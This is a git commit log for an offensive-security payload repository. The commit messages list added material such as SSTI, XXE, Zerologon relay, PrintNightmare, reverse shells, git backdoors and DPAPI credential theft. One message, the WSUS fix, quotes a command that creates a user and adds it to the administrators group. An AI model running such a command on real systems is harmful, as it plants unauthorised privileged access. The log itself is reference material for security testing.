2023-02-14 15:15:04 +01:00
Swissky
36e135776f AD Groups + PowerShell Defenses 2023-02-14 15:13:41 +01:00
Techbrunch
da42d27a3c Update sponsor link
Thanks for the link ❤️
2023-02-14 14:26:49 +01:00
Swissky
f1a85f22b9 Windows Defenses 2023-02-12 18:17:09 +01:00
Swissky
5cd5de6803 Workflow cleanup 2023-02-11 20:32:36 +01:00
Swissky
9a511046ae GPO update timing 2023-02-11 20:29:32 +01:00
Swissky
c08949fdc2 Github Pages Trigger 2023-02-11 20:22:28 +01:00
Swissky
2089c5efb1 Github Pages 2023-02-11 20:11:33 +01:00
Swissky
14cc88371d WSL + RDP Passwords + MSPaint Escape 2023-02-11 17:49:55 +01:00
Swissky
ccae5a6e09 Credentials Rework 2023-02-11 12:07:25 +01:00
Swissky
8c88590d7c Merge pull request #621 from SSKale1/master
Add AWSGoat and Azure Training, AzureGoat
2023-02-01 09:54:34 +01:00
Shantanu Kale
b03250a4f6 Add Training, AzureGoat 2023-02-01 09:48:26 +05:30
Shantanu Kale
ce40e39dcc Add AWSGoat 2023-02-01 09:46:13 +05:30
Swissky
4451d4919a Merge pull request #620 from noraj/patch-1
SSTI: add some jinja2 examples
2023-01-28 16:31:51 +01:00
Alexandre ZANNI
89782643c9 SSTI: add some jinja2 examples 2023-01-28 15:29:54 +01:00
Swissky
d0067e13d5 Merge pull request #619 from CravateRouge/patch-2
Add PrintNightmare exploit using WebDAV
2023-01-24 09:53:54 +01:00
CravateRouge
a8bef1873a Add PrintNightmare exploit using WebDAV 2023-01-23 17:06:05 +01:00
Swissky
b75913ca8f Merge pull request #616 from noraj/patch-1
add XXE in Java
2023-01-19 17:14:19 +01:00
Swissky
d23794be0f Merge pull request #617 from CravateRouge/patch-1
Add SSL MITM using OpenSSL
2023-01-19 17:13:44 +01:00
CravateRouge
230f8c3688 Add SSL MITM using OpenSSL 2023-01-19 16:33:11 +01:00
Alexandre ZANNI
563a1b2a1d add XXE in Java 2023-01-19 10:23:56 +01:00
Swissky
99ff1f94b3 Merge pull request #615 from noraj/patch-url
[chore] fix rawsec url
2023-01-12 09:57:27 +01:00
Alexandre ZANNI
442d253936 fix rawsec url 2023-01-11 23:19:26 +01:00
Swissky
1a9bfdd86f Merge pull request #614 from Darktortue/patch-zerologon
Added zerologon authentication relay technique
2023-01-10 21:11:43 +01:00
Darktortue
8caba394d5 Added zerologon authentication relay technique 2023-01-10 11:23:45 +01:00
Swissky
b27ba26af9 Merge pull request #609 from m3dsec/patch-1
Update bloodyAD.py when enabling DONT_REQ_PREAUTH for ASREPRoast attack.
2023-01-10 11:06:07 +01:00
Swissky
8e0ce56e5d Merge pull request #613 from JeremyLARDENOIS/fix-docker-metasploit-install
fix: remove docker metasploit installation
2023-01-10 11:05:09 +01:00
Jérémy LARDENOIS
3a97ad3f41 fix: remove docker metasploit installation 2023-01-10 08:51:28 +01:00
Swissky
d4742a9688 SOCKS Compatibility Table + CORS 2023-01-05 01:50:11 +01:00
Swissky
095024f960 Merge pull request #611 from DotDotSlashRepo/master
Updated Account takeover due to unicode normalization issue
2023-01-04 17:21:55 +01:00
DotDotSlash
418ff228d0 Formatting changes
Formatting changes to Account takeover due to unicode normalization issue
2023-01-04 21:06:36 +05:30
DotDotSlash
b7df4cb6e8 Updated unicode normalization issue
Added helpful tools to 'Account takeover due to unicode normalization issue'
2023-01-04 21:03:20 +05:30
somebodyoncetoldme
aa8950a273 Update PostgreSQL Injection.md
Switch "column_name" to "table_name".
2023-01-03 21:02:57 -08:00
m3dsec
834c6bca20 Update bloodyAD.py when enabling DONT_REQ_PREAUTH for ASREPRoast attack. 2023-01-01 14:24:57 +01:00
Swissky
5190829ab4 RustHound Examples 2022-12-30 11:01:31 +01:00
Swissky
ec7c363aba Merge pull request #592 from oddrabbit/patch-1
Added in Spring Framework SSTI Detection & Exploitation
2022-12-28 10:55:13 +01:00
Swissky
996c83bb4b Update README.md 2022-12-28 10:54:48 +01:00
Swissky
4888188ce4 Merge pull request #608 from Aur0ra-m/master
Update README.md
2022-12-27 18:26:52 +01:00
Swissky
f318f8bcc0 Update README.md 2022-12-27 18:26:13 +01:00
Aur0ra
29c23ac7fd Update README.md 2022-12-27 18:30:20 +08:00
Swissky
514ac98dac SSRF + XSS details + XXE BOM 2022-12-13 22:29:20 +01:00
Swissky
a1c5926f31 Merge pull request #606 from hackprogrammatic/patch-1
Update Cloud - AWS Pentest.md
2022-12-08 08:46:05 +01:00
hackprogrammatic
749420fdd2 Update Cloud - AWS Pentest.md
spelling errors, update allows users to easily copy/paste
2022-12-07 22:47:41 -06:00
Swissky
6709d543f4 Merge pull request #605 from Techbrunch/patch-12
Add GraphQL Threat Matrix
2022-12-06 16:49:42 +01:00
Techbrunch
2f923463a2 Add GraphQL Threat Matrix 2022-12-06 14:24:46 +01:00
Swissky
d67ec2469c SCCM Shares 2022-12-04 11:38:19 +01:00
Swissky
183876f660 Merge pull request #603 from romisfrag/patch-1
Update PHP.md
2022-11-26 17:01:40 +01:00
romisfrag
f8ab0ca3bb Update PHP.md
Fixed the payload (was not working because guess is size 5 instead of 4).
Changed the name of Object to ObjectExample because the Object class name is reserved
2022-11-26 14:28:06 +01:00
Swissky
cbb2137f3b ESC11 - Relay NTLM to ICPR 2022-11-21 10:48:27 +01:00
Swissky
2ed3c03e78 Kubernetes Pentest 2022-11-18 13:00:11 +01:00
Swissky
5966c3a21b NTDS Reversible Encryption 2022-11-11 14:52:56 +01:00
Swissky
4ca065f8ed Merge pull request #602 from Kawsay/master
Add RubyOnRails HTTP Parameter Pollution
2022-11-08 19:33:10 +01:00
Clément COQUILLE
6f265dedd6 Add RubyOnRails HTTP Parameter Pollution 2022-11-08 19:06:51 +01:00
Swissky
b7f6f72d09 Merge pull request #600 from CravateRouge/patch-6
Add application endpoint enumeration
2022-11-07 12:28:04 +01:00
CravateRouge
95e989f5a1 Add application endpoint enumeration 2022-11-07 11:47:47 +01:00
Swissky
e5ea12a3ca Active Directory Federation Services 2022-11-07 10:10:33 +01:00
Swissky
3e9ef2efbe ADFS Golden SAML 2022-11-07 10:10:21 +01:00
Swissky
0212830fb4 Merge pull request #599 from CravateRouge/patch-5
Fix broken link not compatible with MkDocs
2022-11-06 12:34:56 +01:00
Swissky
eea32c0d15 Merge pull request #597 from xplo1t-sec/master
command injection with backslash newline
2022-11-06 12:28:38 +01:00
Swissky
47254d0244 Update README.md 2022-11-06 12:28:26 +01:00
Swissky
2d67b675aa Merge pull request #598 from CravateRouge/patch-4
findstr ignore error and print results in file
2022-11-06 12:19:22 +01:00
CravateRouge
c14392731c Fix broken link not compatible with MkDocs 2022-11-06 12:12:36 +01:00
CravateRouge
e5a18a72c2 findstr ignore error and print results in file 2022-11-06 11:58:00 +01:00
xplo1t-sec
c1d1c9fcbc command injection with backslash newline 2022-11-06 14:22:30 +05:30
Swissky
c17ae602fc Merge pull request #596 from CravateRouge/patch-2
Add AzureHound examples
2022-11-04 16:42:49 +01:00
Swissky
030ba1f196 Merge pull request #595 from CravateRouge/patch-3
Redirect duplicate
2022-11-04 15:15:55 +01:00
CravateRouge
18c656f756 Add AzureHound examples 2022-11-04 15:09:39 +01:00
CravateRouge
598751f7c6 Redirect duplicate 2022-11-04 14:43:20 +01:00
Swissky
2d3f02a795 Merge pull request #594 from CravateRouge/patch-2
Add Snaffpoint usage example
2022-11-04 14:38:17 +01:00
CravateRouge
a287736a3a Add Snaffpoint usage example 2022-11-04 14:15:08 +01:00
Swissky
d46b436d6c PHP Deserialization - Fix Broken Link 2022-11-04 09:44:37 +01:00
Swissky
e556e9ad40 Merge pull request #589 from jaxBCD/patch-2
Update Subdomain enumeration
2022-11-03 21:34:48 +01:00
Swissky
3dd7f46717 Update Subdomains Enumeration.md 2022-11-03 21:34:34 +01:00
Swissky
2227472e1c .NET formatters and POP gadgets 2022-11-03 21:31:50 +01:00
Swissky
0af790ad5b Merge pull request #593 from llamasoft/patch-2
Add git persistence techniques
2022-10-30 10:14:49 +01:00
Marcus T
11fbceca31 Add git persistence techniques
Adds information about backdooring git configs and git hooks.
2022-10-29 19:37:32 -07:00
OddRabbit
b672771a1b Update README.md 2022-10-28 00:07:26 +11:00
Swissky
0381fd34f9 Merge pull request #591 from fabianchoxD/review-and-update-documentation
Review and update documentation
2022-10-27 10:18:49 +02:00
Fabian S. Varon Valencia
6394757dc3 added a new reference to code injection 2022-10-26 20:38:01 -05:00
Fabian S. Varon Valencia
8136e462c2 remove old link, I can't find a replacement url 2022-10-26 20:36:52 -05:00
Fabian S. Varon Valencia
3822c27634 update old url's 2022-10-26 20:36:15 -05:00
Swissky
a7d774cd15 Merge pull request #590 from llamasoft/patch-1
Add timestomping to Linux evasion techniques
2022-10-26 22:51:06 +02:00
Marcus T
501975a330 Add timestomping to Linux evasion techniques 2022-10-26 15:40:03 -04:00
jaxBCD
d999f798d7 Update Subdomain enumeration 2022-10-25 15:44:37 +07:00
Swissky
5754ed82ee Merge pull request #588 from fabianchoxD/update-old-links
Update old links
2022-10-25 09:32:14 +02:00
Fabian S. Varon Valencia
916c1079c6 typo 2022-10-24 12:30:33 -05:00
Fabian S. Varon Valencia
7ada8ef9ea add new resource to documentation - JSON web Token 2022-10-24 12:30:22 -05:00
Fabian S. Varon Valencia
3adbd70b01 remove not found links 2022-10-24 12:29:59 -05:00
Fabian S. Varon Valencia
b00ba7f38d replace current 404 link with 200 Time Machine web snapshot 2022-10-24 12:29:32 -05:00
Fabian S. Varon Valencia
9128b183d3 update link URL 2022-10-24 12:28:31 -05:00
Swissky
fe41254fde XXS Public Example + PHP Filter RCE 2022-10-24 12:05:39 +02:00
Swissky
35ff178624 Merge pull request #587 from abhishekchak52/typo-grammar-fix
Typo and grammar fix
2022-10-23 11:20:30 +02:00
Swissky
1e01f83c74 Merge pull request #586 from nzdjb/nzdjb-patch-3
feat: Explain ec2:AssociateIamInstanceProfile
2022-10-23 11:19:35 +02:00
Abhishek Chakraborty
37da322136 Typo and grammar fix 2022-10-22 17:47:10 -07:00
nzdjb
c5146f5dc8 feat: Explain ec2:AssociateIamInstanceProfile
Add explanation for ec2:AssociateIamInstanceProfile.
Also, fix a typo.
2022-10-23 09:24:08 +13:00
Swissky
a43897a473 Merge pull request #585 from 7RU7H/patch-1
Update Windows -Privilege Escalation - Typo Fix
2022-10-22 16:04:23 +02:00
7RU7H
22fe4d16e2 Update Windows -Privilege Escalation - Typo Fix
# Line 304 - Typo: `...\CurentControlSet\..` -> `...\CurrentControlSet\..`
2022-10-22 14:27:01 +01:00
Swissky
9f37576173 Merge pull request #583 from nzdjb/nzdjb-patch-2
feat: Backgrounding long running commands
2022-10-22 10:29:30 +02:00
Swissky
a33e4006f8 Merge pull request #582 from nzdjb/nzdjb-patch-1
feat: Command injection with newlines
2022-10-22 10:20:42 +02:00
nzdjb
5ca6c9a22b feat: Add entry to page contents. 2022-10-22 20:05:57 +13:00
nzdjb
def7c40830 feat: Backgrounding long running commands 2022-10-22 19:52:36 +13:00
nzdjb
1dc5054c4d feat: Command injection with newlines 2022-10-22 16:46:29 +13:00
Swissky
8df30de938 Remove deadlink 2022-10-21 12:16:32 +02:00
Swissky
1b037a9c64 Merge pull request #581 from Oggy107/master
Fix: Broken Link
2022-10-18 19:22:55 +02:00
Urmalveer Singh
4e5521deae Fix: Broken Link
Changed name in summary links: Django Template > Django Templates
Fixed corresponding link: #django-template > #django-templates
2022-10-18 14:38:10 +05:30
Swissky
2fc3eed8a5 Insecure Randomness 2022-10-17 11:07:33 +02:00
Swissky
8df0f565f3 Sapphire and Diamond Tickets 2022-10-16 20:46:05 +02:00
Swissky
b7043cfedd Bug Hunting Methodology Update 2022-10-16 00:27:47 +02:00
Swissky
3a815e6201 Merge pull request #578 from ShahneRodgers/http-request-smuggling
Adds more details to the HTTP request smuggling topic
2022-10-15 12:31:05 +02:00
Swissky
7bbbbd1d83 Merge pull request #577 from llamasoft/linux-evasion
Add Linux evasion to its own article
2022-10-15 12:28:05 +02:00
llamasoft
78ff651643 Add Linux evasion to its own article
Linux evasion techniques were previously included as part of persistence,
but the techniques are varied enough that it should likely
be its own article.
2022-10-14 17:30:25 -04:00
Swissky
a794c57994 Merge pull request #575 from CoryCline/patch-1
Added document.cookie blacklist bypass
2022-10-14 09:57:41 +02:00
Cory Cline
a8d8434756 Shortened payload
Make payload shorter.
2022-10-13 19:48:20 -05:00
Cory Cline
fbed4254e5 Fixed an oops
Somehow I deleted line 120 in a prior commit. Fixed.
2022-10-13 18:52:07 -05:00
Cory Cline
9ee8f092cd Changed link for document.cookie blacklist
Link was not working due to use of period in title.
2022-10-13 18:46:52 -05:00
Cory Cline
9a42be1113 Replaced console.log with alert
It's more common to want alert screenshots vs console screenshots.
2022-10-13 18:45:55 -05:00
Cory Cline
f23f28c4e2 Shortened payload
Shortened the document.cookie blacklist bypass payload.
2022-10-13 18:43:54 -05:00
Cory Cline
5d561ea7d6 Added document.cookie blacklist bypass
Added an alternative to document.cookie for situations when this text is blacklisted.
2022-10-13 18:23:36 -05:00
Swissky
6479c3a400 Merge pull request #574 from sebch-/patch-5
Update Active Directory Attack.md
2022-10-12 21:43:44 +02:00
Swissky
34128314d3 Merge pull request #573 from sebch-/patch-4
Update README.md
2022-10-12 21:43:16 +02:00
Swissky
31363e016b Merge pull request #572 from sebch-/patch-3
Update Active Directory Attack.md
2022-10-12 21:42:34 +02:00
Seb
b809e104e6 Update Active Directory Attack.md 2022-10-12 21:24:47 +02:00
Seb
26cc3629ce Update README.md 2022-10-12 20:35:32 +02:00
Seb
f18d4991ff Update Active Directory Attack.md 2022-10-12 19:47:40 +02:00
Swissky
aca668fcdd Merge pull request #571 from sebch-/patch-2
Update Hash Cracking.md
2022-10-12 19:30:22 +02:00
Seb
5480c40098 Update Hash Cracking.md 2022-10-12 19:29:15 +02:00
Seb
ad5bbd49f1 Update Hash Cracking.md 2022-10-12 18:06:22 +02:00
Swissky
f7a74feaf7 Azure Tools Update 2022-10-12 18:03:49 +02:00
Swissky
6dd5c18b45 Normalize Titles 2022-10-12 12:13:55 +02:00
Swissky
d88e32aaae .NET Deserialization 2022-10-11 21:52:46 +02:00
Swissky
3392980207 Merge pull request #570 from gdraperi/patch-1
Update README.md
2022-10-11 18:49:41 +02:00
Swissky
4a1ba26326 Update README.md 2022-10-11 18:49:17 +02:00
gdraperi
5e3d1d80c8 Update README.md
Adding the WGET command and fixing errors in the summary part.
2022-10-11 17:29:53 +02:00
Swissky
b08600d56d Merge pull request #526 from nerrorsec/patch-4
Boolean - Extract info (order by)
2022-10-11 11:26:40 +02:00
Swissky
3f3736471e Merge branch 'master' into patch-4 2022-10-11 11:26:28 +02:00
Swissky
77dc5e3ff1 Merge pull request #566 from pop3ret/master
Merge AWSome Pentesting into Cloud - AWS Pentest
2022-10-11 11:24:21 +02:00
Swissky
ecca4ec5e4 Merge pull request #569 from fabianchoxD/update-.README-file
Update .readme file
2022-10-10 15:06:19 +02:00
pop3ret
0530c19c88 Update Cloud - AWS Pentest.md 2022-10-09 16:03:33 -03:00
pop3ret
4b4a630085 Changed summary and chapters
Changed summary to include the cheatsheet and also changed the format of the cheatsheet to be the same as the original file
2022-10-09 16:01:14 -03:00
Fabian S. Varon Valencia
c82ec3a902 update URL 0dayallday is not working, same article found in blackmarble.sh 2022-10-08 23:32:31 -05:00
Fabian S. Varon Valencia
a07468af9b use web archive to retrieve a readable version of this website - currently unavailable 2022-10-08 23:31:43 -05:00
Fabian S. Varon Valencia
5cdc02282c update 10 password reset flaws URL 2022-10-08 23:30:31 -05:00
Fabian S. Varon Valencia
d214af633c remove post exploitation koadic link (not found) 2022-10-08 22:53:55 -05:00
Fabian S. Varon Valencia
ea86f20472 Add AMSI Bypass and DPAPI links 2022-10-08 22:53:35 -05:00
pop3ret
cabc51e43b Merge branch 'swisskyrepo:master' into master 2022-10-07 07:56:54 -03:00
Swissky
522b55eec5 Update Cloud - AWS Pentest.md 2022-10-07 10:50:59 +02:00
Swissky
c06dfbec95 Merge pull request #560 from clem9669/master
Update XSS_Polyglots.txt
2022-10-07 00:14:29 +02:00
pop3ret
00189411d4 Merge AWSome Pentesting into Cloud - AWS Pentest
Merge the notes with the existing one
2022-10-06 13:43:09 -03:00
Swissky
347381d6dc Merge pull request #565 from gdraperi/master
Argument Injection technique
2022-10-06 17:55:58 +02:00
Swissky
ba9eb30940 Fix links 2022-10-06 17:55:16 +02:00
gregory draperi
69c6ee87c6 Argument Injection technique 2022-10-06 16:56:44 +02:00
Swissky
655cec1f1a Merge pull request #562 from nayeems3c/master
Added 2FA bypass via Force Browsing on Account Takeover branch
2022-10-05 18:46:52 +02:00
Swissky
2c10b28976 Merge pull request #561 from gdraperi/patch-2
Update YAML.md
2022-10-05 14:55:34 +02:00
gdraperi
666a90ffee Update YAML.md
Updating the actual risks for Python
2022-10-05 13:47:24 +02:00
Nayeem Islam
7e82d93897 Added 2FA bypass via Force Browsing on Account Takeover branch 2022-10-05 17:42:01 +06:00
clem9669
2aa353a5b9 Update XSS_Polyglots.txt
Adding the latest BruteLogic polyglot
2022-10-05 09:45:15 +00:00
Swissky
a766679356 Merge pull request #559 from gdraperi/patch-1
Update README.md
2022-10-05 10:20:58 +02:00
Swissky
643374e1d7 Add reference 2022-10-05 10:20:05 +02:00
gdraperi
2d03a74555 Update README.md
Adding payloads for Citrix and Cisco
2022-10-05 10:06:21 +02:00
Swissky
44d761eb2c Merge pull request #558 from CyberVarun/master
Added portswigger labs and reference in Command injection
2022-10-05 09:58:40 +02:00
Varun Jagtap
3022c25995 Added portswigger labs and reference 2022-10-05 12:50:10 +05:30
Swissky
c420ed6bf7 Merge pull request #553 from ndsvw/Linkfix
Fixed invalid hyperlink
2022-10-04 11:08:59 +02:00
Swissky
a1c783d8d2 Merge pull request #555 from mschader/patch-8
CVE Exploit: Add trickest CVE repo
2022-10-04 09:42:05 +02:00
Swissky
a5c91d8ed3 Merge pull request #556 from mschader/patch-9
Zip Slip: Add slipit to tools
2022-10-04 09:40:51 +02:00
Swissky
77b0599653 Merge pull request #554 from qligier/master
XXE: Improve the documentation
2022-10-03 18:44:54 +02:00
Markus
950114b9e6 Zip Slip: Add slipit to tools 2022-10-03 18:19:28 +02:00
Markus
f8d04cef3b CVE Exploit: Add trickest CVE repo 2022-10-03 17:51:39 +02:00
Quentin Ligier
6bbdc85aa2 XXE: Improve the documentation
- Add two references: "OWASP XXE prevention cheat sheet" and "XXE: How to become a Jedi"
- Describe the Parameters Laugh attack
- Expand the WAF bypass method with UTF-7
- Update the summary
2022-10-03 17:14:22 +02:00
Alexander Lübeck
576322d475 Fixed invalid hyperlink 2022-10-02 15:58:16 +02:00
Swissky
bbe4bbce05 Merge pull request #552 from swisskyrepo/hacktober-methodo-rework
Methodology and enumeration rework
2022-10-02 13:14:35 +02:00
Swissky
99a1304af9 Methodology and enumeration rework 2022-10-02 13:13:16 +02:00
Swissky
3f1689b9bc Merge pull request #551 from swisskyrepo/hacktober-blind-ssti
Blind SSTI Jinja
2022-10-02 12:27:07 +02:00
Swissky
4ed3e3b6b9 Blind SSTI Jinja 2022-10-02 12:24:39 +02:00
Swissky
444d8ad169 Merge pull request #549 from InTruder-Sec/master
Added PortSwigger Labs to the repo
2022-10-02 12:16:08 +02:00
Swissky
6b9f6de7dd Merge pull request #548 from mschader/patch-7
Java RMI: Add remote-method-guesser to tools
2022-10-02 12:14:51 +02:00
Deep Dhakate
a670a26eea Update 2022-10-02 06:13:01 +00:00
Shahne Rodgers
1659e7c50e Adds more details to the HTTP request smuggling topic
I've tried to give a brief (and certainly not exhaustive) summary of what HTTP request smuggling actually is, HTTP/2 request smuggling attacks and James Kettle's new research on client-side desync attacks.
2022-10-02 16:12:44 +13:00
Markus
bd6a1b759a Java RMI: Add remote-method-guesser to tools
This also includes slight adjustments to the README.md to adhere to the current contribution example layout
2022-10-01 22:04:49 +02:00
Deep Dhakate
9f0c70d46f update 2022-10-01 19:56:49 +00:00
Swissky
9d1421a6c3 Merge pull request #547 from mschader/patch-6
Api Key Leaks: Add Trivy to tools section
2022-10-01 19:01:47 +02:00
Markus
b7d275d5b0 Api Key Leaks: Add Trivy to tools section 2022-10-01 17:20:51 +02:00
Swissky
72a8556dc9 NodeJS Serialization 2022-09-23 11:21:29 +02:00
Swissky
7a528ccb3f Merge pull request #545 from noraj/patch-1
Blind NoSQL scripts
2022-09-23 00:38:05 +02:00
Alexandre ZANNI
7e2fa15462 Blind NoSQL scripts
- add missing menu item
- use better string interpolation for python script
- add ruby script
2022-09-23 00:36:41 +02:00
Swissky
2d30e22121 DPAPI - Data Protection API 2022-09-23 00:35:34 +02:00
Swissky
6b76c452a7 Merge pull request #544 from Processus-Thief/master
update hekatomb to install with pip
2022-09-22 16:12:23 +02:00
Processus Thief
8d564ff78b update hekatomb to install with pip
hekatomb is now available on pypi to simplify its installation
2022-09-22 16:10:20 +02:00
Swissky
097756da1c Merge pull request #543 from noraj/patch-1
add 3 template engines + add lang in menu
2022-09-21 11:42:32 +02:00
Alexandre ZANNI
3e68276fb7 add 3 template engines + add lang in menu 2022-09-21 11:28:57 +02:00
Swissky
c3421582bc Merge pull request #542 from Processus-Thief/master
Adding Hekatomb.py to DPAPI credentials stealing
2022-09-20 22:31:07 +02:00
Processus Thief
885f8bdb8f Adding Hekatomb.py to DPAPI credentials stealing
Hekatomb is a python script that connects to an LDAP directory to retrieve all computers and users' information.
Then it will download all DPAPI blobs of all users from all computers.
Finally, it will extract the domain controller private key through RPC and use it to decrypt all credentials.

More info here: https://github.com/Processus-Thief/HEKATOMB
2022-09-20 16:56:07 +02:00
Swissky
267713c0fb YAML Deserialization 2022-09-16 16:37:40 +02:00
Swissky
e677f07197 Merge pull request #539 from dhmosfunk/master
add a new tool for manual http request smuggling exploitation
2022-09-16 08:53:00 +02:00
Dhmos Funk
b4e7add674 add simple http smuggler generator for easier manual exploitation 2022-09-16 02:30:57 +03:00
Dhmos Funk
d5aed653e8 Update README.md 2022-09-14 18:05:31 +03:00
Swissky
b8afbc8f92 Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2022-09-13 22:04:58 +02:00
Swissky
c7dd67986c Oracle SQL 2022-09-13 22:04:21 +02:00
Swissky
d32c48bad8 Merge pull request #538 from clem9669/master
XSS: Adding brutelogic polyglot
2022-09-13 15:03:34 +02:00
clem9669
88134256c8 Adding brutelogic polyglot
Adding brutelogic polyglot from blog post.
2022-09-13 11:58:10 +00:00
Swissky
0ca060c049 Merge pull request #537 from dhmosfunk/master
Update the Postgresql time based payloads for database,table,columns extract
2022-09-10 16:44:20 +02:00
Dhmos Funk
aa89a909d1 Update PostgreSQL Injection.md 2022-09-10 15:56:31 +03:00
Swissky
38fa931b84 Merge pull request #525 from mrThe/patch-1
Add boolean-error-based vector for the sqlite
2022-09-07 14:02:54 +02:00
Swissky
7663594118 Update SQLite Injection.md 2022-09-07 14:02:38 +02:00
Swissky
e11a37e6a2 Merge pull request #515 from vladko312/patch-1
Added a new SSTI tool
2022-09-07 14:01:09 +02:00
Swissky
d24e3f2d61 Merge pull request #497 from kz-cyber/xss/angular-xss-2
[update] Angular XSS payload
2022-09-07 00:34:29 +02:00
Swissky
b6e7210ee0 Merge pull request #501 from fantesykikachu/win-p3-revshell
Add Windows Python3 Reverse Shell
2022-09-06 23:23:50 +02:00
Swissky
86e8feca7c Merge pull request #499 from p3n7a90n/NosqliPayloads
Added basic SSJI payloads
2022-09-06 23:17:12 +02:00
Swissky
26e9cb6dc1 Merge pull request #504 from MilyMilo/master
Add new ruby yaml gadget chain
2022-09-06 23:16:13 +02:00
Swissky
fb7f10eab8 Merge pull request #485 from ajdumanhug/master
SSRF: Don't encode entire IP
2022-09-06 23:15:20 +02:00
Swissky
8d609b1460 Update README.md 2022-09-06 23:15:12 +02:00
Swissky
84fa229a44 Merge pull request #463 from nismo-s13/master
Delete Parser & Curl < 7.54.png
2022-09-06 23:13:55 +02:00
Swissky
3e8ef29223 Merge pull request #536 from CravateRouge/patch-1
Update bloodyAD attacks
2022-09-06 19:32:21 +02:00
CravateRouge
dad7362da6 Update bloodyAD attacks 2022-09-06 19:13:34 +02:00
Swissky
191a72c57e Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2022-09-06 10:05:16 +02:00
Swissky
2be739ea4f Fixing TGS/ST 2022-09-06 10:03:49 +02:00
Swissky
bdc2d55dd9 Merge pull request #533 from 0xsyr0/patch-1
Quick fix for WSUS malicious patch
2022-09-04 20:54:17 +02:00
Swissky
9e2471a472 SCCM Network Account 2022-09-04 20:51:23 +02:00
Swissky
fae02107df Jetty RCE Credits 2022-09-04 14:24:16 +02:00
Swissky
4bc5f724b2 Moving learning resources into a specific folder 2022-09-03 16:17:23 +02:00
Swissky
811863501b ESC9 - No Security Extension 2022-09-03 12:07:24 +02:00
Swissky
b1c46228c2 Merge pull request #535 from Techbrunch/patch-11
Add Django Templates SSTI
2022-08-30 14:43:38 +02:00
Techbrunch
7850928d41 Add detection 2022-08-30 13:54:59 +02:00
Techbrunch
871b3bcaf2 Add Django Templates SSTI 2022-08-30 13:50:03 +02:00
0xsry0
343d63f79f Quick fix for WSUS malicious patch
Not sure if it is deprecated, but while tackling the box Outdated on HTB, the command didn't work with two `&&`. To concatenate `"net user WSUSDemo Password123! /add ` and `net localgroup administrators WSUSDemo /add\""`, the `^&` is required.
2022-08-24 09:10:55 +02:00
Swissky
fbd7517e04 LFI2RCE - Picture Compression - SOCKS5 CS 2022-08-21 16:38:54 +02:00
Swissky
e7af5aeb84 Merge pull request #532 from wlayzz/patch-2
Update java ssti
2022-08-19 16:25:00 +02:00
Wlayzz
961d935623 Update java ssti
fix little inattention
2022-08-19 16:22:39 +02:00
Swissky
b25f461b6e Merge pull request #531 from wlayzz/patch-1
Update Java SSTI
2022-08-19 15:16:46 +02:00
Wlayzz
8d70f262ae Update Java SSTI
Adding variable expressions alternative for java injection
2022-08-19 15:04:52 +02:00
Swissky
804920be62 Source Code Management 2022-08-18 10:43:01 +02:00
Swissky
abc78a6a67 Merge pull request #528 from denandz/patch-1
Add multipart/form-data CSRF technique
2022-08-17 14:24:34 +02:00
DoI
b3e6220da6 Add multipart/form-data CSRF technique 2022-08-17 09:29:05 +12:00
Swissky
6650c361e7 Capture a network trace with builtin tools 2022-08-15 15:02:29 +02:00
Swissky
55e05b4b17 Merge pull request #527 from natrajms/patch-2
Updating Reference section hyperlinks
2022-08-15 11:40:15 +02:00
Natraj Sangashetty
1bd82af11e Updating Reference section hyperlinks 2022-08-15 11:15:33 +05:30
nerrorsec
418285b7f6 Boolean - Extract info (order by) 2022-08-13 10:07:54 +05:45
mr.The
f82efffbc7 Boolean error based* instead of just error based 2022-08-12 18:36:43 +03:00
mr.The
0d9a2354e5 Add error-based vector for the sqlite 2022-08-12 18:33:44 +03:00
Swissky
683167d4e9 Merge pull request #521 from mh4ckt3mh4ckt1c4s/ssti-detection
Add SSTI detection payload + related resource
2022-08-09 22:09:15 +02:00
Swissky
11271d9072 Jetty RCE 2022-08-09 22:06:55 +02:00
Swissky
fa849c00f2 Jetty RCE + Upload tricks 2022-08-09 22:05:45 +02:00
Swissky
919fee6320 Merge pull request #524 from its0x08/master
fix: Fix spelling
2022-08-09 14:05:19 +02:00
its0x08
31b213227e fix: Fix more spelling 2022-08-09 11:05:40 +02:00
its0x08
fc1f3b25a7 fix: Fix spelling 2022-08-09 11:02:21 +02:00
Swissky
55c9689487 Merge pull request #522 from aelmosalamy/patch-1
Typo fix
2022-08-08 22:08:20 +02:00
Adham Elmosalamy
1b2471265a Typo fix 2022-08-08 16:08:55 +04:00
mh4ckt3mh4ckt1c4s
9d274a39a4 Add SSTI detection payload + related resource 2022-08-05 20:05:20 +02:00
Swissky
7fe0a0475e Docker Escape cgroup 2022-08-05 12:26:31 +02:00
Swissky
835d6fffe0 Shadow Credentials 2022-08-05 12:00:41 +02:00
Swissky
52e255cb75 Merge pull request #520 from sebch-/patch-1
Update Active Directory Attack.md
2022-08-03 19:20:11 +02:00
Swissky
fe1fa242ba Merge pull request #519 from spidyhackx/patch-1
typo
2022-08-03 19:19:40 +02:00
Spidycodes
bb6c9ed172 typo 2022-08-02 21:48:07 +00:00
Seb
310338b279 Update Active Directory Attack.md
Find AD
2022-08-02 15:09:23 +02:00
Swissky
e386a110d9 Find DC 2022-07-27 17:23:30 +02:00
Swissky
83c4658ff8 Merge pull request #517 from svewa/master
Twig in Wordpress
2022-07-24 13:22:24 +02:00
s. vewa
33d632df4e Twig in Wordpress
Was very unsuccessful with the given Twig examples: quotes were escaped so they became invalid, and file_excerpt threw an error, too. Include and also injecting the file name helped. Don't know if this is a wordpress thing...
2022-07-24 12:30:09 +02:00
Swissky
820147466a Merge pull request #516 from jjeyanthan/patch-1
Update OracleSQL Injection.md
2022-07-20 19:31:11 +02:00
Jeyanthan
7ad7ae722d Update OracleSQL Injection.md
missing 'T' in the SELECT in the Oracle blind SQLI section
2022-07-20 13:34:27 +02:00
Vladislav Korchagin
7b79bce819 Update README.md 2022-07-17 18:35:59 +03:00
Swissky
d9921e370b Merge pull request #511 from buddyeatsbugs/master
Update CSWSH payload
2022-06-30 20:37:05 +02:00
somebodyoncetoldme
d0a198ffee Update README.md 2022-06-30 10:37:41 -07:00
Swissky
fc8fadbb0c PR Guidelines + User Hunting + HopLa Configuration 2022-06-30 16:33:35 +02:00
fantesykikachu
f6c455d8f9 Windows Python3 Reverse Shell 2022-06-28 06:54:06 +00:00
Swissky
b9e847decb Merge pull request #510 from MarwanNour/patch-1
Added DirtyPipe to kernel exploits
2022-06-23 17:19:05 +02:00
Marwan Nour
36e417f129 Added DirtyPipe to kernel exploits
Fixed some links in the table of contents
